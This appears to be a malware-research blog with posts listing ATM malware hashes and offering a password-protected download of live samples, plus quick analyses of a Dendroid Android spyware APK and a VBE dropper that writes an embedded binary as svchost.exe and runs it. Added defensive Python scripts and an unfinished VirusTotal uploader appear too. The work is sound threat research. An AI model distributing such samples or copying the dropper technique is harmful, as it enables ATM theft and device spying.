<h1>Data0.Net Security Blog</h1>
Notes, Programming, Analysis, Finding, Malware<br />
<br />
<h2>Collection of ATM Malware, GreenDispenser Samples</h2>
Published 2015-09-30, updated 2016-02-24.<br />
Here you can download the latest ATM malware, called GreenDispenser, and other ATM-related malware samples. I will keep updating this list. If you have more samples or hashes, feel free to leave a comment. Thank you.<br />
<br />
<h3>
Full SHA-256 hash list</h3>
<div>
<br /></div>
<h4>
GreenDispenser</h4>
<ul>
<li>20a1490b666f8c75c47b682cf10a48b7b0278068cb260b14d8d0584ee6c006a5</li>
<li>50db1f5e9692f217f356a592e413e6c9cb31105a94efc70a5ca1c2c73d95d572</li>
<li>7544e7a798b791cb36caaa1860974f33d30bc4659ceab3063d1ab4fd71c8c7e0</li>
<li>77850f738ba42fd9da299b2282314709ad8dc93623b318b116bfc25c5280c541</li>
<li>b7e61f65e147885ec1fe6a787b62d9ee82d1f34f1c9ba8068d3570adca87c54f</li>
</ul>
<h4>
Ploutos</h4>
<ul>
<li>0106757fac9d10a8e2a22dce5337f404bfa1c44d3cc0c53af3c7539888bc4025</li>
<li>0df8ac0440a151fac1f6957f7d181640590e1eb3e4c4cbd9968892e59f34f941</li>
<li>34acc4c0b61b5ce0b37c3589f97d1f23e6d84011a241e6f85683ee517ce786f1</li>
<li>d99339d3dc6891cdd832754c5739640c62cd229c84e04e9e3cad743c6f66b1b9</li>
</ul>
<h4>
Suceful</h4>
<ul>
<li>c7cb44e0b075cbc90a7c280ef8f1c69e8fe06e7dabce054b61b10c3105eda1c4</li>
<li>d33d69b454efba519bffd3ba63c99ffce058e3105745f8a7ae699f72db1e70eb</li>
</ul>
<br />
<h4>
Tyupkin</h4>
<ul>
<li>b670fe2d803705f811b5a0c9e69ccfec3a6c3a31cfd42a30d9e8902af7b9ed80</li>
<li>16166533c69f2f04110e8b8e9cc45ed2aeaf7850fa68845c64d92ff907dd44f0</li>
<li>6c59cd1e12bc1037031af48b934e9398fc85efb2a067d03b6a100dd8423e5d9b</li>
<li>8bb5c766de0a73dc0eff7c9fce086565b6220465185e258c21c5b9dfb0bef51d</li>
<li>639d2d926325275cb023014d0b446d03f1dcc8526bff1aa72373e27d78a6a674</li>
<li>853fb4e85d8b0ad7c156ad6d3fc4b0340c8b29fa0548a3df758e7845ba8b23ae</li>
<li>3639e8cc463922b427ea20dce8f237c0c0e82aa51d2502c48662e60fb405f677</li>
</ul>
<br />
<h4>
NeoPocket</h4>
<ul>
<li>85652bbd0379d73395102edc299c892f21a4bba3378aa3b0aaea9b1130022bdd</li>
</ul>
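As an added example (not part of the original post), here is a Python script that hashes every file under a directory and matches it against the SHA-256 list above. The indicator set is copied from the list; the scan directory and the constructed demo files are my own.

```python
"""Match files on disk against the SHA-256 indicator list above.

Added example, not part of the original post: the hashes are the ones the
post lists; everything else (the scan directory, the constructed demo files)
is mine.
"""
import hashlib
import os
import tempfile

# Indicator set copied from the post's hash list, keyed by malware family.
ATM_MALWARE_SHA256 = {
    "GreenDispenser": [
        "20a1490b666f8c75c47b682cf10a48b7b0278068cb260b14d8d0584ee6c006a5",
        "50db1f5e9692f217f356a592e413e6c9cb31105a94efc70a5ca1c2c73d95d572",
        "7544e7a798b791cb36caaa1860974f33d30bc4659ceab3063d1ab4fd71c8c7e0",
        "77850f738ba42fd9da299b2282314709ad8dc93623b318b116bfc25c5280c541",
        "b7e61f65e147885ec1fe6a787b62d9ee82d1f34f1c9ba8068d3570adca87c54f",
    ],
    "Ploutos": [
        "0106757fac9d10a8e2a22dce5337f404bfa1c44d3cc0c53af3c7539888bc4025",
        "0df8ac0440a151fac1f6957f7d181640590e1eb3e4c4cbd9968892e59f34f941",
        "34acc4c0b61b5ce0b37c3589f97d1f23e6d84011a241e6f85683ee517ce786f1",
        "d99339d3dc6891cdd832754c5739640c62cd229c84e04e9e3cad743c6f66b1b9",
    ],
    "Suceful": [
        "c7cb44e0b075cbc90a7c280ef8f1c69e8fe06e7dabce054b61b10c3105eda1c4",
        "d33d69b454efba519bffd3ba63c99ffce058e3105745f8a7ae699f72db1e70eb",
    ],
    "Tyupkin": [
        "b670fe2d803705f811b5a0c9e69ccfec3a6c3a31cfd42a30d9e8902af7b9ed80",
        "16166533c69f2f04110e8b8e9cc45ed2aeaf7850fa68845c64d92ff907dd44f0",
        "6c59cd1e12bc1037031af48b934e9398fc85efb2a067d03b6a100dd8423e5d9b",
        "8bb5c766de0a73dc0eff7c9fce086565b6220465185e258c21c5b9dfb0bef51d",
        "639d2d926325275cb023014d0b446d03f1dcc8526bff1aa72373e27d78a6a674",
        "853fb4e85d8b0ad7c156ad6d3fc4b0340c8b29fa0548a3df758e7845ba8b23ae",
        "3639e8cc463922b427ea20dce8f237c0c0e82aa51d2502c48662e60fb405f677",
    ],
    "NeoPocket": [
        "85652bbd0379d73395102edc299c892f21a4bba3378aa3b0aaea9b1130022bdd",
    ],
}


def build_index(indicators):
    """Invert {family: [sha256, ...]} into {sha256: family} for O(1) lookups."""
    index = {}
    for family, hashes in indicators.items():
        for digest in hashes:
            index[digest.lower()] = family
    return index


def sha256_of_file(path, chunk_size=1 << 20):
    """Hash a file in 1 MiB chunks so large samples never need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_directory(root, index):
    """Walk `root` and return [(path, family)] for every file whose SHA-256 is a known indicator."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_of_file(path)
            except OSError:
                continue  # unreadable or special file: skip it rather than abort the scan
            family = index.get(digest)
            if family:
                hits.append((path, family))
    return hits


def demo_scan():
    """Scan a constructed directory holding one benign file and one file whose
    hash we register as a (constructed) indicator; returns the hit list."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "benign.txt"), "wb") as fh:
        fh.write(b"constructed benign content")
    marked = os.path.join(root, "marked.bin")
    with open(marked, "wb") as fh:
        fh.write(b"constructed content standing in for a sample")
    index = build_index(ATM_MALWARE_SHA256)
    index[sha256_of_file(marked)] = "ConstructedFamily"  # not a real indicator
    return scan_directory(root, index)


if __name__ == "__main__":
    import sys
    for path, family in scan_directory(sys.argv[1] if len(sys.argv) > 1 else ".",
                                       build_index(ATM_MALWARE_SHA256)):
        print("%s\t%s" % (family, path))
```

Saved as, say, atm_ioc_scan.py, it is run as `python atm_ioc_scan.py /path/to/quarantine`; unreadable files are skipped rather than aborting the scan, and the index is keyed on lowercase hex so hashes copied from reports in either case still match.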
<br />
<br />
<h4>
Download From Google Drive:</h4>
<br />
<ul>
<li><a href="https://drive.google.com/folderview?id=0B6y1wjhVZ-WPbmR4aTJkOUZDUUE&usp=sharing" target="_blank">Click here to download</a> (password-protected zip)</li>
<li>Feel free to ask for the password (preferably by email: alternator99 |at| gmail.com).</li>
</ul>
<br />
<h4>
References:</h4>
<br />
<ul>
<li>https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html</li>
<li>https://www.proofpoint.com/us/threat-insight/post/Meet-GreenDispenser</li>
<li>https://securelist.com/blog/research/66988/tyupkin-manipulating-atm-machines-with-malware/</li>
</ul>
<h4>
Update:</h4>
<ul>
<li>Added another 5 Tyupkin and 4 Ploutos samples. Thanks to <b>n3r0</b> for the samples.</li>
</ul>
<br />
<h2>Tweetdeck XSS Vulnerability Causes Users to Auto-Retweet</h2>
Published 2014-06-12.<br />
As a TweetDeck user myself, I saw that somebody posted a new XSS payload on Twitter, causing thousands of users to automatically retweet the message carrying the script. So far this only affects TweetDeck in the browser.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4yBDcI4WQlcZsculury1yHKrGSCPM5vfJ5OD2UfQeouwRatm3Ee_cXvGaOWWTCfQeNTR0Sy9KQnbDqdfQR5uLB46Ld3wAOtStu1And81Z33kYkKM1_W6L7lv1J2MPpZBeB_jj-phL_c/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4yBDcI4WQlcZsculury1yHKrGSCPM5vfJ5OD2UfQeouwRatm3Ee_cXvGaOWWTCfQeNTR0Sy9KQnbDqdfQR5uLB46Ld3wAOtStu1And81Z33kYkKM1_W6L7lv1J2MPpZBeB_jj-phL_c/s1600/1.png" height="105" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
An example of a post that has been retweeted.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbDRgpnhFnfdOqXwNiIHtbu_t9cO8It966Fwhi1JC-kObOMTLxLJSye6O8-dXPy0RSwb_pfRTspqtuy9KjtP9pugdr-ux1RD8z4yLpHYPTmaTZ6sqxTw9zJBsGMC5urYAI5PmN5iIE2Dw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbDRgpnhFnfdOqXwNiIHtbu_t9cO8It966Fwhi1JC-kObOMTLxLJSye6O8-dXPy0RSwb_pfRTspqtuy9KjtP9pugdr-ux1RD8z4yLpHYPTmaTZ6sqxTw9zJBsGMC5urYAI5PmN5iIE2Dw/s1600/2.png" height="171" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
An example of the XSS message popping up. Once the user clicks OK, it retweets the post.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEickLrviTClP90wZxj5Mq22Honao5B3NrdiCyEYy91QJQpuDvURlTPYwfBIQQPuZS-p2PuAGGSytl6_QFrDSoR7awm5PuOI975ODLixWJmcyaje2DfiwcdPdYlVl5h-NsSGGtcW3bhP5-8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEickLrviTClP90wZxj5Mq22Honao5B3NrdiCyEYy91QJQpuDvURlTPYwfBIQQPuZS-p2PuAGGSytl6_QFrDSoR7awm5PuOI975ODLixWJmcyaje2DfiwcdPdYlVl5h-NsSGGtcW3bhP5-8/s1600/3.png" height="256" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
By the time this happened, the TweetDeck server was taken down temporarily for a fix, and around 40k retweets had already been made.<br />
<br />
~ alternat0r<br />
<br />
<h2>HeartBleed May 'Break Your Heart' as Data Leaks</h2>
Published 2014-04-09.<br />
<div style="text-align: justify;">
The recent OpenSSL bug called Heartbleed (CVE-2014-0160) has put millions of websites in trouble. A Heartbleed test tool developed by Filippo Valsorda has been released as open source. I just played around with it a bit.<br />
<br />
BTW, what is the Heartbleed bug? It is a vulnerability in the OpenSSL cryptography library that allows any user to read system memory (only vulnerable versions are affected).<br />
<br />
In Malay: it is a weakness in the cryptography library of the OpenSSL software that allows an outside user to read system memory (only certain versions are affected).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
When I tested several Malaysian websites, most critical organisations' websites were exposed to this vulnerability, including government sites.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6S1EmBSEJ7ull7gpazcXlAxmIqxM_4iIzLRuONha4OfRoGT_5URJJUJHg1qKhadTerXcz9A9QOa-vhiCr8oW9IU04vq-adgPZxbYDD3hdpvfREiHlQZVVluVQLRpUTjOfXRpi6I3biYo/s1600/hb1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6S1EmBSEJ7ull7gpazcXlAxmIqxM_4iIzLRuONha4OfRoGT_5URJJUJHg1qKhadTerXcz9A9QOa-vhiCr8oW9IU04vq-adgPZxbYDD3hdpvfREiHlQZVVluVQLRpUTjOfXRpi6I3biYo/s1600/hb1.jpg" height="324" width="100%" /></a></div>
<br />
<span style="text-align: justify;">Filippo also provides a website where you can test your web server; if it is vulnerable you will get a message like the one in the image below:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrli57ZxfOWpseZHX8-m5G85y8sW3fue-BNRT9i1v8Ba58kMz0YmkykD4f5IKTVhGk72rD-we32D9Eoq_JUsoel7l2jJZ0jNA25q-mo6bGh03KM9OnRs7E9Rm5RuNWBd-FpHYs9shdSFY/s1600/hb2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrli57ZxfOWpseZHX8-m5G85y8sW3fue-BNRT9i1v8Ba58kMz0YmkykD4f5IKTVhGk72rD-we32D9Eoq_JUsoel7l2jJZ0jNA25q-mo6bGh03KM9OnRs7E9Rm5RuNWBd-FpHYs9shdSFY/s1600/hb2.jpg" height="458" width="100%" /></a></div>
<br />
Alternatively you can use the Malaysia Honeynet Heartbleed website to test your web server:<br />
http://heartbleed.honeynet.org.my/<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Here is some good advice on how to protect yourself from the Heartbleed bug:<br />
http://www.cnet.com/news/how-to-protect-yourself-from-the-heartbleed-bug/<br />
<br />
<b>References</b>:<br />
http://heartbleed.com/<br />
https://github.com/FiloSottile/Heartbleed<br />
http://filippo.io/Heartbleed<br />
http://heartbleed.honeynet.org.my/<br />
https://gist.github.com/harlo/10199638<br />
<br />
~ alternat0r<br />
<h2>Dendroidbot Quick Analysis</h2>
Published 2014-03-13.<br />
As I got a sample of the Dendroid APK malware, I decided to do a quick analysis on it. Thanks to <a class="g-profile" href="https://plus.google.com/111962545432947598219" target="_blank">+Mila Parkour</a> for the sample.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-37Kt9clNsS0/UxnRA3_47VI/AAAAAAAAO5s/KzbCSqnYQzw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-37Kt9clNsS0/UxnRA3_47VI/AAAAAAAAO5s/KzbCSqnYQzw/s1600/2.png" height="267" width="400" /></a></div>
<br />
Sample hashes (MD5):<br />
DB01F96D5E66D82F7EB61B85EB96EF6E<br />
52A30B58257D338617A39643E2216D0C<br />
<br />
The original sample is protected with <a href="http://www.saikoa.com/dexguard" target="_blank">DexGuard</a>, which adds extra protection to its code: it appears obfuscated when decompiled.<br />
<br />
The following permissions can be used once it has been installed:<br />
<ul>
<li>directly call phone numbers</li>
<ul>
<li>read phone status and identity</li>
<li>reroute outgoing calls</li>
</ul>
<li>edit your text messages (SMS or MMS)</li>
<ul>
<li>read your text messages (SMS or MMS)</li>
<li>receive text messages (SMS)</li>
<li>send SMS messages</li>
</ul>
<li>take pictures and videos</li>
<li>record audio</li>
<li>precise location (GPS and network-based)</li>
<li>read call log</li>
<ul>
<li>read your contacts</li>
</ul>
<li>read your Web bookmarks and history</li>
<li>modify or delete the contents of your SD card</li>
<li>find accounts on the device</li>
<li>full network access</li>
<ul>
<li>view network connections</li>
</ul>
<li>retrieve running apps</li>
<li>prevent phone from sleeping</li>
<li>modify system settings</li>
<ul>
<li>test access to protected storage</li>
</ul>
</ul>
Analysing the Java classes, it can also determine whether it is running in an emulator. Going through its Java classes, there is a lot of functionality that would be able to completely spy on your phone.<br />
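As an added example (not the post's own tooling and not taken from the Dendroid sample), the Python below parses an Android manifest's permission set and flags the spyware-like combination the list above describes. Both manifests are constructed; the mapping from the Play-store wording in the list to android.permission names, and the grouping into capability classes, are my own assumptions.

```python
"""Triage an Android manifest's permission set for spyware-like capability.

Added example; not the post's own analysis tooling and not taken from the
Dendroid sample. The two manifests below are constructed. The mapping from
the Play-store wording in the list above to android.permission names, and
the risk grouping, are my own assumptions.
"""
import xml.etree.ElementTree as ET

ANDROID_NAME = "{http://schemas.android.com/apk/res/android}name"

# Capability groups a spyware RAT tends to combine (assumed grouping).
CAPABILITY_GROUPS = {
    "sms": {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
            "android.permission.SEND_SMS", "android.permission.WRITE_SMS"},
    "calls": {"android.permission.CALL_PHONE", "android.permission.READ_PHONE_STATE",
              "android.permission.PROCESS_OUTGOING_CALLS", "android.permission.READ_CALL_LOG"},
    "surveillance": {"android.permission.CAMERA", "android.permission.RECORD_AUDIO",
                     "android.permission.ACCESS_FINE_LOCATION"},
    "data": {"android.permission.READ_CONTACTS", "android.permission.GET_ACCOUNTS",
             "com.android.browser.permission.READ_HISTORY_BOOKMARKS"},
    "network": {"android.permission.INTERNET"},
}

# Constructed manifest requesting the capabilities the post lists.
SPYWARE_LIKE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed">
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
  <uses-permission android:name="android.permission.WRITE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.GET_TASKS"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
</manifest>"""

# Constructed manifest for an ordinary online app: network only.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.benign">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
</manifest>"""


def requested_permissions(manifest_xml):
    """Set of android:name values from every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NAME) for el in root.iter("uses-permission") if el.get(ANDROID_NAME)}


def triage(permissions):
    """Which capability groups the app holds, and whether the combination is
    spyware-like: network access plus at least two of sms/calls/surveillance/data."""
    held = {group for group, perms in CAPABILITY_GROUPS.items() if perms & permissions}
    spyware_like = "network" in held and len(held - {"network"}) >= 2
    return {"groups": sorted(held), "spyware_like": spyware_like}


if __name__ == "__main__":
    for label, xml in (("constructed spyware-like", SPYWARE_LIKE_MANIFEST),
                       ("benign", BENIGN_MANIFEST)):
        print(label, triage(requested_permissions(xml)))
```

The verdict rule is deliberately about combinations rather than any single permission: a messaging app legitimately needs SMS, a map needs location, but one package that can read SMS, place calls, record audio, read contacts and reach the network at the same time is the profile of a RAT and deserves a closer look at its classes, as the post goes on to do.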
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc4VXlci2XiVNPyp6uKN_oS44WmmFfF4z9cgK2MFjAMJshhqzQEK11CIq7zOiUNtD6zJy1fpW67kWJG3jg8SDIZO6-ioppq4qyDXzs-mCx4OXcGRYtgopvMd2JwPcDRYpdTAkmpsq0-GE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc4VXlci2XiVNPyp6uKN_oS44WmmFfF4z9cgK2MFjAMJshhqzQEK11CIq7zOiUNtD6zJy1fpW67kWJG3jg8SDIZO6-ioppq4qyDXzs-mCx4OXcGRYtgopvMd2JwPcDRYpdTAkmpsq0-GE/s1600/3.png" height="171" width="400" /></a></div>
<br />
initiate() loads a pre-defined, base64-encoded configuration.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqnkhMQUzWiIsyP6fqOPVKwVDiWS4of8ZEA32aqQFbFOO2wF0QVq4d6BQh_Mj6owa1ojE8nIggs-PZeGZD7mygZSkNpydOzWbl4NiyFA7AbIx2HdYtus9XBWiT3s1Q8ozkIrIQQ5ty9Ow/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqnkhMQUzWiIsyP6fqOPVKwVDiWS4of8ZEA32aqQFbFOO2wF0QVq4d6BQh_Mj6owa1ojE8nIggs-PZeGZD7mygZSkNpydOzWbl4NiyFA7AbIx2HdYtus9XBWiT3s1Q8ozkIrIQQ5ty9Ow/s1600/1.png" height="160" width="400" /></a></div>
<br />
Here is the VirusTotal detection list:<br />
<a href="https://www.virustotal.com/en/file/099a57328de9335c524f44514e225d50731c808145221affdd684d8b4dad5a1d/analysis/">https://www.virustotal.com/en/file/099a57328de9335c524f44514e225d50731c808145221affdd684d8b4dad5a1d/analysis/</a><br />
<br />
Note that this sample is an earlier version of Dendroid. Some users might already have found a more recent version of it bound to another application to make it look like a legitimate app.<br />
<br />
<br />~ alternat0r<br />
<h2>Countdown to Windows XP End of Support</h2>
Published 2014-02-19.<br />
The end of Windows XP support will be on Saturday, 8 April 2014.<br />
<br />
<br />
<a href="http://windows.microsoft.com/en-US/windows/products/lifecycle">http://windows.microsoft.com/en-US/windows/products/lifecycle</a><br />
<br />
<br />
<h2>ApacheBench behind the Encoded VBE file</h2>
Published 2014-02-01, updated 2014-02-04.<br />
Recently a friend sent me a VBE file that looked suspicious because of its encoded content, with a request to do a quick analysis on it. So I played around with it to see what's inside.<br />
<br />
The file I got is named s64.vbe (MD5 0B826D9869B139B2C5BB139234C08D43) and its content is an encoded script. The size of this file is around 608,904 bytes. The content of the encoded file is shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFkovUBnv3uWNEPS9WT9qgZ_KPvzh1gGOD5XVnotNCy8jWQLJvSg8jEgs7qgz0DD4Ugry5BvdRyDibZxY6NluwjKSLj2KYYWaT0C_FgyuvID2r6AkCiD2LTQYM4Un0PoSSm1Fixyk8aQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFkovUBnv3uWNEPS9WT9qgZ_KPvzh1gGOD5XVnotNCy8jWQLJvSg8jEgs7qgz0DD4Ugry5BvdRyDibZxY6NluwjKSLj2KYYWaT0C_FgyuvID2r6AkCiD2LTQYM4Un0PoSSm1Fixyk8aQ/s1600/1.png" height="80" width="400" /></a></div>
<br />
To decode this file I used <a href="http://www.interclasse.com/scripts/decovbe.php" target="_blank">scriptDecode.vbs from Jean-Luc Antoine</a>. The decoded output is a VBScript, as shown in the picture below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F3MxLrg3Gd2OJhsOQMDvi76EnB9P2Uz2Fhrpu5gZGugJqMSp-DbVEBPGXhxdP1OzKxh1xif9bBudh1Tc_Lx9Sh69ID7HUDu7VM4Zu3MqSTqzxkSDqyE1UMTPZvyx3NrQnT9hE-VbWdg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F3MxLrg3Gd2OJhsOQMDvi76EnB9P2Uz2Fhrpu5gZGugJqMSp-DbVEBPGXhxdP1OzKxh1xif9bBudh1Tc_Lx9Sh69ID7HUDu7VM4Zu3MqSTqzxkSDqyE1UMTPZvyx3NrQnT9hE-VbWdg/s1600/2.png" height="88" width="400" /></a></div>
<br />
If we scroll to the bottom of the file we can see some kind of Windows binary that has been converted into ASCII form inside the VBS. The script saves it to disk under the file name svchost.exe and runs it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVCYve_rpzFmfOPfjyckgjub-10MU5fTOtNx3jXfppryMg_aA4TaCr4mOA5ibku1Pt59QOwU2jTjv_rl_bfTyagZ4-W-vqDdq9wND2AyGSioxHeu-iC09GgvGldc1qQS71D74EZc2VPVU/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVCYve_rpzFmfOPfjyckgjub-10MU5fTOtNx3jXfppryMg_aA4TaCr4mOA5ibku1Pt59QOwU2jTjv_rl_bfTyagZ4-W-vqDdq9wND2AyGSioxHeu-iC09GgvGldc1qQS71D74EZc2VPVU/s1600/3.png" height="220" width="400" /></a></div>
<br />
Most antivirus products already detect this file as malicious:<br />
<br />
<a href="https://malwr.com/analysis/YzkzNDUxOTlmOTQxNDAxYmEwNjdmNGI4MTk5YjBmYzI/share/1a8cbf4acb5944d1856d04d4e72b8ed7">https://malwr.com/analysis/YzkzNDUxOTlmOTQxNDAxYmEwNjdmNGI4MTk5YjBmYzI/share/1a8cbf4acb5944d1856d04d4e72b8ed7</a><br />
<br />
<a href="https://www.virustotal.com/en/file/6b01071c7936d4a1ba1f53b5651db5f604dfe7f5aa3e4ed38d48f6ba66eebd5e/analysis/">https://www.virustotal.com/en/file/6b01071c7936d4a1ba1f53b5651db5f604dfe7f5aa3e4ed38d48f6ba66eebd5e/analysis/</a><br />
<br />
The svchost.exe file (MD5 333ABC2F9864B70F7EF48B049CBA9286) is actually the ApacheBench command-line utility. This program is normally used to measure the performance of HTTP web servers. The binary I got does not run correctly, though, as it is sometimes unresponsive. It is possible to abuse this tool for a DDoS attack.<br />
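As an added example (not the post's own tooling and not the content of s64.vbe), the Python below covers the two triage steps of this post: recognising an encoded script by the Script Encoder markers, and carving the dropped binary out of the decoded VBScript to check whether it is a PE. The markers '#@~^' and '^#~@' are the documented Script Encoder format; that the decoded script writes its payload as a run of Chr(n) calls is an assumption about this sample's layout, so the VBScript in the block is constructed to that layout rather than taken from the real file.

```python
"""Triage helpers for an encoded VBE script and the binary a decoded script drops.

Added example, not the post's own tooling and not the s64.vbe content.
What is documented: Microsoft Script Encoder output starts with '#@~^' and
ends with '^#~@'. What is assumed: the decoded VBScript writes its embedded
executable as a run of Chr(n) calls; the script below is constructed to that
layout, so it stands in for the real sample.
"""
import hashlib
import re

VBE_START = b"#@~^"
VBE_END = b"^#~@"

# Minimal constructed PE-shaped blob: MZ header, e_lfanew -> 0x40, 'PE\0\0' there.
MINI_PE = b"MZ" + b"\0" * (0x3C - 2) + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 8

# Constructed decoded VBScript in the assumed layout.
CONSTRUCTED_VBS = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'Set f = fso.CreateTextFile("svchost.exe")\n'
    + "f.Write " + " & ".join("Chr(%d)" % b for b in MINI_PE) + "\n"
    + "f.Close\n"
)

CHR_CALL = re.compile(r"\bChr[BW]?\(\s*(\d+)\s*\)", re.IGNORECASE)


def looks_like_vbe(data):
    """True if the blob carries the Script Encoder start and end markers."""
    data = data.strip()
    return data.startswith(VBE_START) and data.endswith(VBE_END)


def carve_chr_bytes(vbs_text):
    """Concatenate the argument of every Chr(n) call into a byte string.
    Values above 255 would be Unicode characters, not file bytes, so they are
    reported rather than silently truncated."""
    out = bytearray()
    for value in CHR_CALL.findall(vbs_text):
        n = int(value)
        if n > 255:
            raise ValueError("Chr(%d) is not a single byte" % n)
        out.append(n)
    return bytes(out)


def describe_payload(blob):
    """Size, MD5 and whether the blob is a PE (MZ header and 'PE\\0\\0' at e_lfanew)."""
    info = {"size": len(blob), "md5": hashlib.md5(blob).hexdigest(), "is_pe": False}
    if len(blob) >= 0x40 and blob[:2] == b"MZ":
        e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
        info["is_pe"] = blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    return info


if __name__ == "__main__":
    print("VBE marker check on a constructed blob:", looks_like_vbe(b"#@~^AAAAAA==^#~@"))
    print(describe_payload(carve_chr_bytes(CONSTRUCTED_VBS)))
```

On a real decoded script you would feed the text to `carve_chr_bytes`, and the MD5 that `describe_payload` returns is what you submit to VirusTotal or compare against the hash in the post, without ever executing the dropped file.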
<br />
~ alternat0r<br />
<h2>Python - Basic VirusTotal Uploader</h2>
Published 2013-06-21, updated 2014-02-04.<br />
Just a little quick note about submitting a malware sample to VirusTotal.com. Be reminded that this Python code does not handle errors properly; it is just for quick reference.<br />
<br />
<pre class="brush: python"># postfile.py is the multipart-POST helper from the VirusTotal API
# documentation; it must sit next to this script.
import postfile
import sys


def main(argv):
    if len(argv) != 1:
        print("usage: vt_upload.py SAMPLE_PATH")
        sys.exit(1)
    inputfile = argv[0]
    host = "www.virustotal.com"
    selector = "https://www.virustotal.com/vtapi/v2/file/scan"
    fields = [("apikey", "YOUR PUBLIC API KEY")]
    # Read the sample as raw bytes and send it as the "file" form field.
    with open(inputfile, "rb") as fh:
        file_to_send = fh.read()
